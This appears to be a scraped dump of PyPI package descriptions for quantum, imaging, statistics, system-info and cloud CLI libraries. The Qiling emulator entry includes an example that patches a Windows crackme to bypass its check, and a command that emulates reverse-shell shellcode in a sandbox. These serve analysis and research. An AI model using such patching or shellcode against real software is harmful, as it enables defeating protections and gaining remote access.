wantedoptions=QikPropOptions(fast=True,similar=30)success,ret_code,data=service.post_task(\"file1.mol\",options=options)task_id=data[\"id\"]whileTrue:success,ret_code,ret_data=service.get_result(task_id=task_id,output_file=\"file1_result.tar.gz\")ifsuccess:breaksleep(5)See the documentation for each class and function to see its options and expected returns.UtilityThere is an expected return code dataclass calledStatusCodes. It's a simple holder for information regarding the\nHTTP codes returned normally by the QikProp Service API Endpoint and what they mean.The class is imported withfromqikpropserviceimportStatusCodesStatusCodes.ready# 200StatusCodes.created# 201StatusCodes.staged# 202StatusCodes.error# 220StatusCodes.null# 404StatusCodes.unmatched# 409where each of the attributes and codes corresponds to a particular meaning.ready : 200 - GET and POSTTask is ready to pull down.created: 201 - POSTSubmitted task has been accepted by the server and no issues on input validation.staged: 202 - GETTask is queued in the service but has not been processed or is in processing.error : 220 - GETTask has been processed but had an error associated with processing. See data dict or pull error file for details.null : 404 - GETNo task exists on the server with a given IDunmatched : 409 - GET and POSTFor a provided task ID and file data, Checksum/hashing does not match"} +{"package": "qiletianTest", "pacakge-description": "No description available on PyPI."} +{"package": "qilib", "pacakge-description": "QILibQuantum Library for the Quantum Inspire platformInstallationThe Quantum Inspire Library can be installed from PyPI via pip:$ pip install qilibInstalling from sourceClone the qilib repository fromhttps://github.com/QuTech-Delft/qiliband install using pip:$ git clone git@github.com:QuTech-Delft/qilib.git\n$ cd qilib\n$ python3 -m venv env\n$ . ./env/bin/activate\n(env) $ pip install .For development install in editable mode:(env) $ pip install -e .[dev]Install Mongo databaseTo use the MongoDataSetIOReader and MongoDataSetIOWriter a mongodb needs to be installed.\nFor Windows, Linux or OS X follow the instructionshereon how to install the database.After installing the database it has to be configured asreplica setby\ntyping:mongod --replSet \"rs0\"and from within the mongo shell initiate with:rs.initiate()TestingRun all unittests and collect the code coverage:(env) $ coverage run --source=\"./src/qilib\" -m unittest discover -s src/tests -t src\n(env) $ coverage report -m###Type Checking\nFor static type checking, mypy can be used(env) $ cd src\n(env) $ mypy --strict --ignore-missing-imports --allow-untyped-calls -p qilibData setThe three main building blocks of the qilib data set are a DataArray, DataSet and a DataSetIO that provides a\nstorage backend for the DataSet.DataArrayA DataArray is a wrapper around a numpy array and can be used as one. A data array can also have another, or multiple,\ndata arrays as setpoints. For example, in a 2D-scan, there will be a 1D DataArray for the x-axis variable specifying a discrete set of setpoints\nfor that variable, a 2D DataArray for the y-axis variable using the x-axis DataArray as its values and a 2D DataArray\nfor the measured value.The DataArray constructor accepts either:pre-defined data (numpy arrays)array shapes (tuple)The DataArray makes sure that the dimensions of the set arrays are correct with regards to the data array and vice\nversa. That means, e.g., trying to set a 1D array of 10 elements as the data array with a 1D setpoint array of 8\nelements will raise an error.An example of a 2D measurement array,z, that is defined by the main setpoint arrayxand secondary setpoint\narrayy:import numpy as np\nfrom qilib.data_set import DataArray\n\nx_size = 10\ny_size = 5\nx_points = np.array(range(x_size))\ny_points = np.tile(np.array(range(y_size)), [x_size, 1])\nx = DataArray(name=\"x\", label=\"x-axis\", unit=\"mV\", is_setpoint=True, preset_data=x_points)\ny = DataArray(name=\"y\", label=\"y-axis\", unit=\"mV\", is_setpoint=True, preset_data=y_points)\nz = DataArray(name=\"z\", label=\"z-axis\", unit=\"ma\", set_arrays=(x,y), shape=(x_size, y_size))DataSetA DataSet object encompasses DataArrays. A DataSet can have multiple measurement arrays sharing the same setpoints.\nIt is an error to have multiple measurement arrays with different setpoints in one DataSet.A DataSet can be incrementally updated with theadd_data()method, which takes an index specification, a reference to\nthe array that is to be updated and the update data:index, {array_name: update_data}}. In case of multi dimensional\narrays whole rows, or rows of rows, can be updated together. For example:# this sets a single element at the 3rd setpoint along the x-axis, 4th along the y-axis\ndataset.add_data((2,3), {'z': 0.23})\n\n# given that dataset is a 10 x 3 2D dataset:\n# this sets the entire y-axis data at the 5th setpoint along the x-axis\n# ie. the data specifies a value for each of the setpoints along the y-axis\ndataset.add_data(4, {'z': [0.23, 2.6, 0.42]})DataSet specifications:The constructor may accept DataArrays for setpoints and data arrays. Multiple measurement arrays may be specified as\na sequence.The DataSet will raise errors on mismatches in array dimensions.The DataSet will only accept an array if its name does not equal that of any array already in the DataSet.Arrays can be read by the public property .data_arrays (a dict, key is the DataArray name, value the DataArray).\nIn addition, DataArrays are accessible as properties on the DataSet object (for example, an array with name 'x' added\nto a DataSet data_set can be access as data_set.x).Updates made to the DataSet will be sent to the underlying DataSetIOWriter if available.A DataSet can have one, or more, DataSetIOWriters.A DataSet can be instantiated with one DataSetIOReader but not both a DataSetIOWriter and a DataSetIOReader.DataSetIOWriterA DataSet can be instantiated with a DataSetIOWriter that provides a storage backend. All changes made on the DataSet\nare pushed to the storage. There are two DataSetIOWriter implementation available, MemoryDataSetIOWriter and\nMongoDataSetIOWriter.MemoryDataSetIOWriterProvides an in-memory storage backend that can be used for live plotting of a measurement. All data is kept in memory\nand not stored on disc or in database. MemoryDataSetIOWriter should not be instantiated directly but created, along with\na MemoryDataSetIOReader, using the MemoryDataSetIOFactory. The Reader and Writer share a storage queue used to pass\nupdates from one DataSet to another.io_reader, io_writer = MemoryDataSetIOFactory.get_reader_writer_pair()\ndata_set_consumer = DataSet(storage_reader=io_reader)\ndata_set_producer = DataSet(storage_writer=io_writer)MongoDataSetIOWriterProvides a connection to a mongo database that needs to be pre-installed. All updates to a DataSet are stored in the\nmongodb database as events that are collapsed, to represent the complete DataSet, when thefinalize()method is called\non the DataSet. Data can not be written to the database on a finalized DataSet.data_set_name = 'experiment_42'\nwriter = MongoDataSetIOWriter(name=data_set_name)\ndata_set = DataSet(storage_writer=writer, name=data_set_name)DataSetIOReaderClasses that implement the DataSetIOReader interface allow a DataSet to subscribe to data, and data changes, in an\nunderlying storage. To sync from storage thesync_from_storage(timeout)method on a DataSet has to be called. There\nare two implementations of the DataSetIOReader, the MemoryDataSetIOReader and MongoDataSetIOReader.MemoryDataSetIOReaderProvides a way to subscribe to data that is put on a storage queue by a paired MemoryDataSetIOWriter created by the\nMemoryDataSetIOFactory.MongoDataSetIOReaderThe MongoDataSetIOReader creates a connection to a mongodb and subscribes to changes in the underlying document. To\nupdate a DataSet that has been instantiated with a MongoDataSetIOReader a call on the DataSet'ssync_from_storage(timeout)method has to be made. To load a DataSet from the underlying mongodb a static methodload(name, document_id)can be\ncalled with either the DataSet name or _id or both.In the example below, a DataSet is instantiated with MongoDataSetIOReader, synced from storage and the data plotted:consumer_dataset = MongoDataSetIOReader.load(name='experiment_42')\nconsumer_dataset.sync_from_storage(-1)\nplot(consumer_dataset)ExamplesPlot and measure with MemoryDataSetIOIn this example a MemoryDataSetIOWriter and MemoryDataSetIOReader pair is created using the MemoryDataSetIOFactory.\nFake measuremet is run on separate thread, feeding fake measurement data to in-memory storage that the consumer data set\nsyncs from with thesync_from_storage(timeout)method.importrandomimportthreadingimporttimeimportmatplotlib.pyplotaspltfromqilib.data_setimportDataSet,DataArrayfromqilib.data_set.memory_data_set_io_factoryimportMemoryDataSetIOFactoryx_dim=100y_dim=100stop_measuring=Falseio_reader,io_writer=MemoryDataSetIOFactory.get_reader_writer_pair()data_set_consumer=DataSet(storage_reader=io_reader)some_array=DataArray('some_array','label',shape=(x_dim,y_dim))data_set_producer=DataSet(storage_writer=io_writer,data_arrays=some_array)plt.ion()defplot_measured_data():fig,ax=plt.subplots()foriinrange(20):data_set_consumer.sync_from_storage(-1)ax.imshow(data_set_consumer.some_array,cmap='hot',interpolation='nearest')fig.canvas.draw()returnTruedefmeasure_data():whilenotstop_measuring:foriinrange(x_dim):line=[i+j*random.random()forjinrange(y_dim)]data_set_producer.add_data(i,{'some_array':line})time.sleep(0.02)measure_thread=threading.Thread(target=measure_data)measure_thread.start()stop_measuring=plot_measured_data()measure_thread.join()Plot and measure with MongoDataSetIOIn this example one script creates a new DataSet with MongoDataSetIOWriter that stores a copy of the data set in a\nunderlying mongodb which needs to be pre-installed as described above. By instantiating the DataSet with a\nMongoDataSetWriter all updates and additions to the DataSet are reflected in the database. To fetch the data set from\nthe database the static methodload(name, document_id)provided in MongoDataSetIOReader is used. The method returns a\nnew DataSet object that subscribes to all changes in the underlying data set and can be updated with thesync_from_storagemethod.In one console run scriptAandBin another one. Make sure start scriptAbeforeBas the former\ncreates the data set in the database that the latter attempts to load.Aimportrandomfromtimeimportsleepimportnumpyasnpfromqilib.data_setimportDataSet,DataArray,MongoDataSetIOWriterx_dim=100y_dim=100measurements=DataArray(name=\"measurements\",label=\"a-data\",unit=\"ma\",preset_data=np.NaN*np.ones((x_dim,y_dim)))writer=MongoDataSetIOWriter(name='experiment_42')data_set=DataSet(storage_writer=writer,name='experiment_42',data_arrays=measurements)foriinrange(x_dim):line=[i+j*random.random()forjinrange(y_dim)]data_set.add_data(i,{'measurements':line})sleep(0.5)data_set.finalize()Bimportmatplotlib.pyplotaspltfromqilib.data_setimportMongoDataSetIOReaderplt.ion()consumer_data_set=MongoDataSetIOReader.load(name='experiment_42')fig,ax=plt.subplots()whilenotconsumer_data_set.is_finalized:consumer_data_set.sync_from_storage(0)ax.imshow(consumer_data_set.measurements,cmap='hot',interpolation='nearest')fig.canvas.draw()"} +{"package": "qililab", "pacakge-description": "QililabQililab is a generic and scalable quantum control library used for fast characterization and calibration of quantum chips. Qililab also offers the ability to execute high-level quantum algorithms with your quantum hardware.ContributionsThank you for your interest in our project. While we appreciate your enthusiasm and interest in contributing, we would like to clarify our policy regarding external contributions.Our Contribution PolicyThis project is primarily intended for reference purposes, and we do not actively accept or manage external contributions, including pull requests and issue reports. Our development team maintains this codebase for internal use and does not have the capacity to review or merge contributions from the community.Why We Have This PolicyOur decision to limit external contributions is based on our specific project goals, resource constraints, and internal policies. While we understand the value of collaboration and open-source contributions, we have chosen to maintain this project as a reference rather than a collaborative, community-driven effort.Seeking Help and SupportIf you have questions about using this project or encounter issues, please feel free to open an issue in the repository for discussion. However, please be aware that our ability to provide support or address issues may be limited.Thank you for your understanding and for considering our project. We hope that you find it useful for your needs, and we wish you the best in your open-source endeavors.Sincerely,Qilimanjaro Quantum Tech"} +{"package": "qilimanjaro-portfolio", "pacakge-description": "Qilimanjaro PortfolioQilimanjaro algorithms portfolio repository packaged in a Python library"} +{"package": "qilimanjaroq-client", "pacakge-description": "Qilimanjaro Client LibraryClient library side to connect to Qilimanjaro Quantum Service and interact with Qilimanjaro Quantum devices and simulators."} +{"package": "qilimanjaroq-server", "pacakge-description": "Qilimanjaro Server LibraryServer library side to connect to Qilimanjaro Quantum Service and interact with Qilimanjaro Quantum devices and simulators."} +{"package": "qilin", "pacakge-description": "AI platform"} +{"package": "qiling", "pacakge-description": "Qiling's usecase, blog and related workQiling is an advanced binary emulation framework, with the following features:Emulate multi-platforms: Windows, MacOS, Linux, Android, BSD, UEFI, DOS, MBR, Ethereum Virtual MachineEmulate multi-architectures: 8086, X86, X86_64, ARM, ARM64, MIPS, RISCV, PowerPCSupport multiple file formats: PE, MachO, ELF, COM, MBRSupport Windows Driver (.sys), Linux Kernel Module (.ko) & MacOS Kernel (.kext) viaDemigodEmulates & sandbox code in an isolated environmentProvides a fully configurable sandboxProvides in-depth memory, register, OS level and filesystem level APIFine-grain instrumentation: allows hooks at various levels (instruction/basic-block/memory-access/exception/syscall/IO/etc)Provides virtual machine level API such as save and restore current execution stateSupports cross architecture and platform debugging capabilitiesBuilt-in debugger with reverse debugging capabilityAllows dynamic hotpatch on-the-fly running code, including the loaded libraryTrue framework in Python, making it easy to build customized security analysis tools on topQiling also made its way to various international conferences.2022:Black Hat, EUBlack Hat, MEA2021:Black Hat, USAHack In The Box, AmsterdamBlack Hat, Asia2020:Black Hat, EuropeBlack Hat, USABlack Hat, USA (Demigod)Black Hat, AsiaHack In The Box, Lockdown 001Hack In The Box, Lockdown 002Hack In The Box, CyberweekNullcon2019:Defcon, USAHitconZeronightsQiling is backed byUnicorn engine.Visit our websitehttps://www.qiling.iofor more information.LicenseThis project is released and distributed underfree software license GPLv2and later version.Qiling vs other EmulatorsThere are many open source emulators, but two projects closest to Qiling areUnicorn&Qemu usermode. This section explains the main differences of Qiling against them.Qiling vs Unicorn engineBuilt on top of Unicorn, but Qiling & Unicorn are two different animals.Unicorn is just a CPU emulator, so it focuses on emulating CPU instructions, that can understand emulator memory. Beyond that, Unicorn is not aware of higher level concepts, such as dynamic libraries, system calls, I/O handling or executable formats like PE, MachO or ELF. As a result, Unicorn can only emulate raw machine instructions, without Operating System (OS) contextQiling is designed as a higher level framework, that leverages Unicorn to emulate CPU instructions, but can understand OS: it has executable format loaders (for PE, MachO & ELF at the moment), dynamic linkers (so we can load & relocate shared libraries), syscall & IO handlers. For this reason, Qiling can run executable binary without requiring its native OSQiling vs Qemu usermodeQemu usermode does similar thing to our emulator, that is to emulate whole executable binaries in cross-architecture way. However, Qiling offers some important differences against Qemu usermode.Qiling is a true analysis framework, that allows you to build your own dynamic analysis tools on top (in friendly Python language). Meanwhile, Qemu is just a tool, not a frameworkQiling can perform dynamic instrumentation, and can even hotpatch code at runtime. Qemu does not do eitherNot only working cross-architecture, Qiling is also cross-platform, so for example you can run Linux ELF file on top of Windows. In contrast, Qemu usermode only run binary of the same OS, such as Linux ELF on Linux, due to the way it forwards syscall from emulated code to native OSQiling supports more platforms, including Windows, MacOS, Linux & BSD. Qemu usermode can only handle Linux & BSDInstallationPlease seesetup guidefile for how to install Qiling Framework.ExamplesThe example below shows how to use Qiling framework in the most striaghtforward way to emulate a Windows executable.fromqilingimportQilingif__name__==\"__main__\":# initialize Qiling instance, specifying the executable to emulate and the emulated system root.# note that the current working directory is assumed to be Qiling homeql=Qiling([r'examples/rootfs/x86_windows/bin/x86_hello.exe'],r'examples/rootfs/x86_windows')# start emulationql.run()The following example shows how a Windows crackme may be patched dynamically to make it always display the \"Congratulation\" dialog.fromqilingimportQilingdefforce_call_dialog_func(ql:Qiling):# get DialogFunc address from current stack framelpDialogFunc=ql.stack_read(-8)# setup stack memory for DialogFuncql.stack_push(0)ql.stack_push(1001)# IDS_APPNAMEql.stack_push(0x111)# WM_COMMANDql.stack_push(0)# push return addressql.stack_push(0x0401018)# resume emulation from DialogFunc addressql.arch.regs.eip=lpDialogFuncif__name__==\"__main__\":# initialize Qiling instanceql=Qiling([r'rootfs/x86_windows/bin/Easy_CrackMe.exe'],r'rootfs/x86_windows')# NOP out some codeql.patch(0x004010B5,b'\\x90\\x90')ql.patch(0x004010CD,b'\\x90\\x90')ql.patch(0x0040110B,b'\\x90\\x90')ql.patch(0x00401112,b'\\x90\\x90')# hook at an address with a callbackql.hook_address(force_call_dialog_func,0x00401016)ql.run()The below Youtube video shows how the above example works.Emulating ARM router firmware on Ubuntu X64 machineQiling Framework hot-patch and emulates ARM router's /usr/bin/httpd on a X86_64Bit UbuntuQiling's IDAPro Plugin: Instrument and Decrypt Mirai's SecretThis video demonstrate how Qiling's IDAPro plugin able to make IDApro run with Qiling instrumentation engineGDBserver with IDAPro demoSolving a simple CTF challenge with Qiling Framework and IDAProEmulating MBRQiling Framework emulates MBRQltoolQiling also provides a friendly tool namedqltoolto quickly emulate shellcode & executable binaries.With qltool, easy execution can be performed:With shellcode:$ ./qltool code --os linux --arch arm --format hex -f examples/shellcodes/linarm32_tcp_reverse_shell.hexWith binary file:$ ./qltool run -f examples/rootfs/x8664_linux/bin/x8664_hello --rootfs examples/rootfs/x8664_linux/With binary and GDB debugger enable:$ ./qltool run -f examples/rootfs/x8664_linux/bin/x8664_hello --gdb 127.0.0.1:9999 --rootfs examples/rootfs/x8664_linuxWith code coverage collection (UEFI only for now):$ ./qltool run -f examples/rootfs/x8664_efi/bin/TcgPlatformSetupPolicy --rootfs examples/rootfs/x8664_efi --coverage-format drcov --coverage-file TcgPlatformSetupPolicy.covWith json output (Windows mainly):$ ./qltool run -f examples/rootfs/x86_windows/bin/x86_hello.exe --rootfs examples/rootfs/x86_windows/ --console False --jsonContactGet the latest info from our websitehttps://www.qiling.ioContact us at emailinfo@qiling.io, or via Twitter@qiling_ioorWeiboCore developers, Key Contributors and etcPlease refer toCREDITS.md"} +{"package": "qi.LiveChat", "pacakge-description": "qi.LiveChat Package Readme=========================Overview--------qi.LiveChat is a simple ajax chat product for plone.It requires an external utility that handles message keeping. At the moment only an xmlrpc server is provided. However it is very easy to add other implementations in order to use sql or use a logging facility.Installation------------1) Using buildoutAdd qi.LiveChat to your eggs and zcml sections. Installation can also add a script called \"livechat_server\" to your buildout's bin directory (see \"Usage\"). In order to do thatadd the following section to your buildout[scripts]recipe = zc.recipe.eggeggs = qi.LiveChatand do not forget to add scripts to the parts list.2) Without buildoutThis package is an egg, if you don't use buildout put it in INSTANCE/lib/python and add a file named qi.LiveChat-configure.zcml in INSTANCE/etc/package-includes with the following line:You will of course need to run the qi.LiveChat/qi/LiveChat/server/xmlrpcServer.py script manually.Go to portal quick installer and install qi.LiveChat.Add a chat room and chat away!Usage-----In order to use the provided xmlrpc message keeper you have to run the qi.LiveChat/qi/LiveChat/server/xmlrpcServer.py script. If you used buildout and followed the directions above, there should exist a link named livechat_server provided for convenience inside your buildout's bin folder.Written by G. Gozadinos http://qiweb.netSmiley support code borrowed from PloneBoard.Changelog for qi.LiveChat(name of developer listed in brackets)qi.LiveChat - 0.2- Removed the need for twisted, now uses SimpleXMLRPCServer- Using buildout will add a link in /bin to the xmlrpc server[G. Gozadinos]qi.LiveChat - 0.1- Initial version.[G. Gozadinos]"} +{"package": "qilum", "pacakge-description": "Qilum is a statistical and utility library supplementing existing statistical libraries\nincluding numpy [1] and scipy [2].\nWe use numba library [3] to speed up some calculations.In this first version, we provide several random number generators. They are based on the\nC++ LOPOR library [4]\nand the article Canonical local algorithms for spin systems: heat bath\nand Hasting methods [5].\nWe respect the scipy.stats random number generator interface and any of the scipy.stats classes can be used to initialize qilum classes.The main classes are:Dist_reject. Construct an exact generator for any probability functions. This is the fastest method when you do not know how to calculate or inverse the cumulative [5].Dist_sum. Construct a sum of known distributionsDist_scale. Apply scaling for x and y, for any distributions, even negative scaling for xDist_cubicSpline. Create an approximate random number generator for any functions using cubic spline. If you need an exact random number generator, use Dist_reject. TheDist_cubicSplinecan be used instead ofscipy.stats.rv_histogram, if you need a smooth functionDist_walker. Create a very fast random number generator for discrete distributions.In addition, we expose the functionf_walkerwhich calculates the parameters of the Walker algorithm [6]The most up-to-date Qilum documentation can be found athttps://www.qilum.comThe source code can be found athttps://bitbucket.org/daminou_fr/qilumExample: Discrete Walker distribution Dist_walker# Define a discrete distribution with Walker algorithm \nimport qilum.stats as qs\nwalker = qs.Dist_walker(probabilities=[0.2, 0.5, 0.3], values=[0, 10, 2])\n# and call the random number generator\nrans = walker.rvs(size=100000)Example: Sum of distributions Dist_sum# exponential distributions left and right types\nexp_left = qs.Dist_scale(scipy.stats.expon(),loc_x=-1.000001, scale_x=-1, scale_y=2, name='Exp+')\nexp_right = qs.Dist_scale(scipy.stats.expon(),loc_x= -1, scale_x= 1, scale_y=2, name='Exp-')\n# sum of the distributions\ndist_sum = qs.Dist_sum([exp_left, exp_right]); \n# random numbers\nrans = dist_sum.rvs(100)Example: Rejection method distribution Dist_reject# generate a random generator for f_f(x) \ndef f_f(xs): return np.where((xs<-5) | (xs>5), 0, 3.*np.exp(-np.power(xs,4)/10.))\n# find a step function above f_f(x)\nxs = np.linspace(-6,6, 1001)\nys = f_f(xs)\nxs_step, ys_step = qs.f_max(xs, ys, 20) \nys_step *= 1.2 # just to be sure that our step function >= f_f() \n# create a distribution for this step function:\nhist_dist = scipy.stats.rv_histogram((ys_step, xs_step))\n# scale this diribution\ncumulative = qs.f_cumulative(xs_step, ys_step)[-1]\ndist_step = qs.Dist_scale(hist_dist, scale_y = cumulative, name='dist_step')\n# create dist_reject \ndist_reject = qs.Dist_reject(dist_step, f_f)\n# random numbers\nrans = dist_reject.rvs(100)References:[1] numpy:https://numpy.org[2] scipyhttps://www.scipy.org/[3] numbahttp://numba.pydata.org[4] C++ LOPOR library:http://www.damienloison.com/finance/LOPOR/index.html[5] Canonical local algorithms for spin systems: heat bath\nand Hasting methods:http://www.damienloison.com/articles/reference26.pdf[6] A.J. Walker, ACM Transaction on Mathematical Software 3 (1977) 253"} +{"package": "qim3d", "pacakge-description": "QIM3D (Quantitative Imaging in 3D)qim3Dis a Python library for quantitative imaging analysis in 3D. It provides functionality for handling data, as well as tools for visualization and analysis.This library contains the tools and functionalities of the QIM platform, accessible athttps://qim.dk/platformInstallationInstall the latest stable version by using pip:pipinstallqim3dOr clone this repository for the most recent version.UsageSome basic funtionalites are descibred here. The full documentation is still under development.Loading DataTo load image data from a file, useqim.io.load()importqim3d# Load a filevol=qim3d.io.load(\"path/to/file.tif\")# Load a file as a virtual stackvol=qim3d.io.load(\"path/to/file.tif\",virtual_stack=True)Visualize dataYou can easily check slices from your volume usingslicesimportqim3dimg=qim3d.examples.fly_150x256x256# By default shows the middle sliceqim3d.viz.slices(img)# Or we can specifly positionsqim3d.viz.slices(img,position=[0,32,128])# Parameters for size and colormap are also possibleqim3d.viz.slices(img,img_width=6,img_height=6,cmap=\"inferno\")GUI ComponentsThe library also provides GUI components for interactive data analysis and exploration.\nTheqim3d.guimodule contains various classes for visualization and analysis:importqim3dapp=qim3d.gui.iso3d.Interface()app.launch()GUIs can also be launched using the Qim3D CLI:$ qim3d gui --data-explorerContributingContributions toqim3dare welcome! If you find a bug, have a feature request, or would like to contribute code, please open an issue or submit a pull request.LicenseThis project is licensed under the MIT License."} +{"package": "qimacode", "pacakge-description": "No description available on PyPI."} +{"package": "qimage2ndarray", "pacakge-description": "qimage2ndarray is a small python extension for quickly converting\nbetween QImages and numpy.ndarrays (in both directions). These are\nvery common tasks when programming e.g. scientific visualizations in\nPython using PyQt4 as the GUI library.Supports conversion of scalar and RGB data, with arbitrary dtypes\nand memory layout, with and without alpha channels, into QImages\n(e.g. for display or saving using Qt).qimage2ndarray makes it possible to create ndarrays that areviewsinto a given QImage\u2019s memory.This allows for very efficient data handling and makes it possible\nto modify Qt image data in-place (e.g. for brightness/gamma or alpha\nmask modifications).Masked arrays are also supported and are converted into QImages\nwith transparent pixels.Supports recarrays (and comes with an appropriate dtype) for\nconvenient access to RGB(A) channels.Supports value scaling / normalization to 0..255 for convenient\ndisplay of arbitrary NumPy arrays.qimage2ndarray is stable and unit-tested."} +{"package": "qimen", "pacakge-description": "No description available on PyPI."} +{"package": "qimp", "pacakge-description": "Qimp![QImP Mascotte](https://github.com/Giacomo-Antonioli/QImP/blob/main/img/QImP.jpg?raw=true)Quantum image manipulation package wrapper for Qiskit.GitHub repo:https://github.com/Giacomo-Antonioli/qimp.gitDocumentation:https://qimp.readthedocs.ioFree software: MITFeaturesTODOQuickstartTODOCreditsThis package was created withCookiecutterand thefedejaure/cookiecutter-modern-pypackageproject template."} +{"package": "qimpy", "pacakge-description": "QimPy (pronounced/'k\u026am-pa\u026a'/)\nis a Python package for Quantum-Integrated Multi-PhYsics.Coding styleThe repository provides a .editorconfig with indentation and line-length rules,\nand a pre-commit configuration to run black and flake8 to enforce and verify style.\nPlease install this pre-commit hook by runningpre-commit installwithin the working directory.\nWhile this hook will run automatically on filed modified in each commit,\nyou can also usemake precommitto manually run it on all code files.Function/method signatures and class attributes must use type hints.\nDocument class attributes using doc comments on the type hints when possible.\nRunmake typecheckto perform a static type check using mypy before pushing code.For all log messages, use f-strings as far as possible for maximum readability.Runmake testto invoke all configured pytest tests. To only run mpi or\nnon-mpi tests specifically, usemake test-mpiormake test-nompi.Best practice: runmake checkto invoke the precommit, typecheck\nand test targets before commiting code."} +{"package": "qimview", "pacakge-description": "Descriptionqimview(qt-based image view) is a set of classes that are designed to visualize and compare images.\nIt uses Python as the main language, and include some code in C++ or OpenGL shading language.\nMain features are:image reader: read type image format (like jpeg and png) and also raw image format (bayer images)image cache: save image reading/uncompressing time by loading previously read image into a bufferimage viewer: different image viewers are availableQT based without OpenGLOpenGL basedimage viewer can have manyfeatures:zomm/pandisplay cursor and image informationdisplay histogrammultiple image viewerto compare a set of imagesvideo vieweris experimental and based on python vlc bindingimagefilterscan be applied:black/white levelsaturationwhite balance"} +{"package": "qin", "pacakge-description": "\u6709\u8da3\u7684\u5de5\u5177\u96c6"} +{"package": "qin-brick", "pacakge-description": "No description available on PyPI."} +{"package": "qin-cli", "pacakge-description": "\u6709\u8da3\u7684\u5de5\u5177\u96c6"} +{"package": "qindomClient", "pacakge-description": "No description available on PyPI."} +{"package": "qinfo-gui", "pacakge-description": "qinfo-guiA gui forqinfousingqinfo-pythonandGTK 3.0qinfo-gui has many of the features of qinfo but now automatically updates its information every 3 seconds. Slow operations, like getting package counts, aren't repeated and only happen on inital loading.qinfo-gui uses the same configuration file and (mostly) takes the same configuration options as qinfo.qinfo-gui is currently invery early development. Not too much time has been put into this application.Installationpipinstallqinfo-guiUsage$ qinfo-gui --help \nusage: qinfo-gui [-h] [-c [CONFIG]] [-s]\n\nA gui for qinfo\n\noptions:\n -h, --help show this help message and exit\n -c [CONFIG], --config [CONFIG]\n Use this config file instead of the one at defualt location.\n -s, --hide_warnings Hide non-critical warnings"} +{"package": "qinfo-python", "pacakge-description": "qinfo-pythonPython Bindings forqinfo.Installationpipinstallqinfo-pythonHow to compileBuild dependencies:Python3 (Cython)gccglibcmakepatchelfgitclone--recurse-submoduleshttps://github.com/el-wumbus/qinfo-pythoncdqinfo-pyhton\npipinstall-r./requirements.txtmakepackageThe package is in thedistdirectory.UsageBelow is a short example of some of the functionality of this module#!/usr/bin/env python3importqinfofromsysimportexitassexitfromosimportenviron,pathdefmain():silent=Falseconfig_file=path.join(environ.get(\"HOME\"),\".config/.qinfo.conf\")configuration_options=qinfo.parse_config(config_file,silent)ifconfiguration_optionsisNone:return1ifconfiguration_options[\"display_cpu\"]:cpu=qinfo.cpu_model()print(f\"CPU:{cpu}\")return0sexit(main())Avaliable Functions & What They Returnavalible_memory()-> intReturns the avalible memory in kB.core_count()-> intReturns the core count.cpu_model()-> stringReturns the cpu model as a string.kernel_release()-> stringReturns the release and name of the kernel.motherboard_model()-> stringReturns the model name of the motherboard along with the manufacturer.os_name()-> stringReturns the operating system name (distro name) as a string.parse_config(config_file_location: string, silent:bool)-> dictReturns a dict of all the configuration options.thread_count()-> intReturns the thread count.total_memory()-> intReturns the total memory in kB.uptime()-> longReturns the uptime in seconds.version()-> stringReturns the version of qinfo being used.hostname()-> stringReturn the hostname of the system as a string.packages()-> dictReturns a dict of the number of packages for each supported package manager.rootfs_age()-> dictReturns a dict of the age of the root file system.shell()-> stringReturns a string containing the shell (or if none found, the calling process).username()-> stringReturns the username of the user running the program as a string.What the dictionaries look likeparse_config()returns a dict of the configuration options and their values.\nThis looks similar to the following:{'display_cpu':1,# Display cpu name and core/thread info'display_etc_cpu':0,# Display extra cpu info'display_mem':1,# Display memory capacity and usage ratio'display_board':1,# Display motherboard info'display_hostname':1,# Display the computer's hostname'display_uptime':1,# Display the system uptime'display_gb':1,# Measure memory in gigabytes instead of kilobytes'display_kernel':1,# Display Kernel release version'display_logo':1,# Display a logo for the OS if supported'display_rootfs_birth':1,# Display the birthdate of the root file system'display_pkg_count':1,# Display the number of packages for every supported package manager'display_shell':1,# Display the shell calling the program'display_username':1,# Display the username of the user calling the program'display_os':1,# Display the os name'date_order':0,# supported formats are YYYY/MM/DD (0) and MM/DD/YYYY (1)'idcolor':'\\x1b[1;36m',# Color for the id column'txtcolor':'',# Color for the text column'logocolor':'\\x1b[0;31m'# Color for the logo}The *color values are ansi escape codes.\nThe rest are int values that are either1or0(a.k.a booleans).rootfs_age()returns a dict containing the date.\nThis will look like the following:{'year':2022,'month':8,'day':21}packages()returns a dict that looks something like the following:{'pacman':979,'apt':372,'apk':87,'flatpak':0,'snap':0}"} +{"package": "qinfpy", "pacakge-description": "QInfPyPython package for Quantum Information"} +{"package": "qing", "pacakge-description": "UNKNOWN"} +{"package": "qingchat", "pacakge-description": "Qingchat is a simple wechat framework, written in Python."} +{"package": "qingchat-server", "pacakge-description": "a listening server for qingchat, depend on qingchat"} +{"package": "qingcloud-cli", "pacakge-description": "qingcloud-cli is the command line interface for managing QingCloud resources,\nwith it you can check, create, delete and operate all your resources,\nit supports Linux, Mac and Windows for now.This CLI is licensed underApache Licence, Version 2.0.NoteRequires Python 2.6 or higher, for more information please seeQingCloud CLI DocumentationInstallationInstall viapip$ pip install qingcloud-cliIf not installed invirtualenv, maybesudois needed$ sudo pip install qingcloud-cliUpgrade to the latest version$ pip install --upgrade qingcloud-cliCommand Completionqingcloud-cli has auto-completion (only support Linux and Mac).If auto-completion doesn\u2019t take effect, please activate it manually.:$ source ~/.bash_profileIf still doesn\u2019t work, please input:$ complete -C qingcloud_completer qingcloudand add this command into your login shell (such as~/.bash_profile).Getting StartedTo use qingcloud-cli, there must be a configuration file to configure your ownqy_access_key_id,qy_secret_access_keyandzone, such as:qy_access_key_id: 'QINGCLOUDACCESSKEYID'\nqy_secret_access_key: 'QINGCLOUDSECRETACCESSKEYEXAMPLE'\nzone: 'pek1'access key can be applied for inQingcloud Console.\nzone is the Node ID where your resources are,\nand it can be checked in the switching node on the console,\nsuch aspek1,pek2,gd1,ap1.The configuration file is saved in~/.qingcloud/config.yamlby default,\nit also can be assigned by the parameter-f/path/to/configwhen executing the command.Input ParametersFor iaas service, the parameters of qingcloud-cli only includeintandstringtype.\nIf the parameters support the list passing,\nthe values shall be separated byEnglish comma. For example:qingcloud iaas describe-keypairs -k 'kp-bn2n77ow, kp-b2ivaf15' -L 2Sometimes, the parameter needs to be string in JSON format, such as:qingcloud iaas add-router-statics -r rtr-ba2nbge6 -s '[{\"static_type\":1,\"val1\":\"80\",\"val2\":\"192.168.99.2\",\"val3\":\"8000\"}]'For qs service, the parameters includeint,stringandlisttype.\nIf 